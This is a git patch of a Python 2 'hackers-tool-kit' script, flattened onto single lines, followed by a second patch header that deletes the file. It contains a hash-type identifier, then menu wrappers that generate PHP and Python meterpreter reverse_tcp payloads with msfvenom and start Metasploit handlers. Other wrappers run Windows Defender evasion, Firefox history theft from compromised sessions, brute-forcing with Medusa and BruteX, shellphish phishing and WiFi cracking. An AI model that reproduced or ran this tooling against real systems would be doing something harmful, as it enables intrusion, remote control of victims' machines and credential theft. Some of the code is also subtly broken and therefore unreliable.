hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +#------------------# +#FIND HASH TYPE END# + + +#RESTART SCRIPT START# +#--------------------# +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +#------------------# +#RESTART SCRIPT END# + + +#MEDUSA AUTOMATED START# +#----------------------# +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +#--------------------# +#MEDUSA AUTOMATED END# + + +#WAF DETECTER START# +#------------------# +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +#----------------# +#WAF DETECTER END# + + +#CLOUDFLARE BYPASS START# +#-----------------------# +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +#---------------------# +#CLOUDFLARE BYPASS END# + + +#BRUTEFORCE ALL SERVICES ON WEB START# +#------------------------------------# +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +#----------------------------------# +#BRUTEFORCE ALL SERVICES ON WEB END# + + +#METERPRETER HELP MENU START# +#---------------------------# +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +#-------------------------# +#METERPRETER HELP MENU END# + + +#WINDOWS DEFENDER BYPASS START# +#-----------------------------# +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +#---------------------------# +#WINDOWS DEFENDER BYPASS END# + + +#USE A EXPLOIT START# +#-------------------# +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +#-----------------# +#USE A EXPLOIT END# + + +#PHISHING AUTOMATED START# +#------------------------# +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +#----------------------# +#PHISHING AUTOMATED END# + + +#LIST DATABASE INFO START# +#------------------------# +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +#----------------------# +#LIST DATABASE INFO END# + + +#ALL METASPLOIT EVASIONS START# +#-----------------------------# +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +#---------------------------# +#ALL METASPLOIT EVASIONS END# + + +#FULLY UPDATE YOUR OS START# +#--------------------------# +def upgrade(): + os.system("apt update && apt upgrade") +#------------------------# +#FULLY UPDATE YOUR OS END# + + +#USE A NMAP SCRIPT START# +#-----------------------# +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +#---------------------# +#USE A NMAP SCRIPT END# + + +#GET HOST SSH VERSION START# +#--------------------------# +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +#------------------------# +#GET HOST SSH VERSION END# + + +#USE PROXYCHAINS FOR WEB START# +#-----------------------------# +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +#---------------------------# +#USE PROXYCHAINS FOR WEB END# + + +#GET HOST MYSQL VERSION START# +#----------------------------# +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +#--------------------------# +#GET HOST MYSQL VERSION END# + + +#CONNECT TO A HOST START# +#-----------------------# +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +#---------------------# +#CONNECT TO A HOST END# + + + +#OPEN NEW TERMINAL START# +#-----------------------# +def terminal(): + os.system("gnome-terminal") +#---------------------# +#OPEN NEW TERMINAL END# + + +#AIRCRACK-NG [WIFI HACK] AUTOMATED START# +#---------------------------------------# +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +#-------------------------------------# +#AIRCRACK-NG [WIFI HACK] AUTOMATED END# + + +#GET SOURCE CODE OF WEB START# +#----------------------------# +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +#--------------------------# +#GET SOURCE CODE OF WEB END# + + +#WEB DIRECTORY SCAN START# +#------------------------# +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +#----------------------# +#WEB DIRECTORY SCAN END# + + + +#APACHE SERVER START# +#-------------------# +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("hit enter to stop server: ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") +#-----------------# +#APACHE SERVER END# + + +#CLEAR ALL START# +#---------------# +def clearall(): + os.system("clear") +#-------------# +#CLEAR ALL END# + + +#RUN A FILE START# +#----------------# +def run(): + print Y+"what program do you want to run the file with Example: python" + p = raw_input(N+"Program: ") + print "\n" + print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" + print "\n" + f = raw_input("Enter File: ") + print "\n" + print Y+"would you like to add arguments when running the file [y/n]\033[0m" + yn = raw_input(G+"[y or n]: \033[0m") + if yn == "n" : + a = '{0} {1}'.format(p,f) + os.system(a) + if yn == "y" : + arg = raw_input("Enter Arguments: ") + a = '{0} {1} {2}'.format(p,f,arg) + os.system(a) +#--------------# +#RUN A FILE END# + + +#REFRESH BANNER START# +#--------------------# +def banner(): + os.system("clear") + mainbanner() +#------------------# +#REFRESH BANNER END# + + +#PHP PAYLOAD START# +#-----------------# +def phpload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> phpload.rc') + os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') + os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) + os.system('echo "exploit\n" >> phpload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r phpload.rc') + os.system('rm -rf phpload.rc') + if yn == "n": + os.system('echo " "') +#---------------# +#PHP PAYLOAD END# + + +#PYLOAD START# +#------------# +def pyload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> pyload.rc') + os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') + os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) + os.system('echo "exploit\n" >> pyload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r pyload.rc') + os.system('rm -rf pyload.rc') + if yn == "n": + os.system('echo " "') +#----------# +#PYLOAD END# + + +#FOXHIS START# +#------------# +def foxhis(): + os.system('echo "sessions\n" >> foxhisses.rc') + os.system('echo "exit\n" >> foxhisses.rc') + os.system("service postgresql restart") + os.system('msfconsole -q -r foxhisses.rc') + os.system('rm -rf foxhisses.rc') + print "\n" + ses = raw_input("Session: ") + print "\nMaximum time (seconds) to wait for a response\n" + time = raw_input("Timeout: ") + os.system('echo "use firefox/gather/history\n" >> foxhis.rc') + os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) + os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) + os.system('echo "run\n" >> foxhis.rc') + os.system('msfconsole -q -r foxhis.rc') + os.system('rm -fr foxhis.rc') +#----------# +#FOXHIS END# + + +#RHAWK START# +#-----------# +def rhawk(): + os.system("cd /root/hackers-tool-kit/redhawk/ && php rhawk.php") +#---------# +#RHAWK END# + + +#NANO START# +#----------# +def nano(): + print "opening nano in \033[93m/root/\033[0m folder" + os.system("sleep 2") + os.system("cd /root/ && nano") +#--------# +#NANO END# + +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# +#-------------------------------------------------------------------------------------------------# +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@tuf_unkn0wn\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + if x == "aserver": + aserver() + if x == "clearall": + clearall() + if x == "run": + run() + if x == "banner": + banner() + if x == "phpload": + phpload() + if x == "pyload": + pyload() + if x == "foxhis": + foxhis() + if x == "rhawk": + rhawk() + if x == "nano": + nano() + found = True +mainbanner() +main() +#-------------------------------------------------------------------------------------------------# +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From 9b91d3297eb6684a3cb8fc1e030e13ef5440c763 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Thu, 30 May 2019 02:00:29 +0100 Subject: [PATCH 164/214] Delete htk.py --- htk.py | 3130 -------------------------------------------------------- 1 file changed, 3130 deletions(-) delete mode 100644 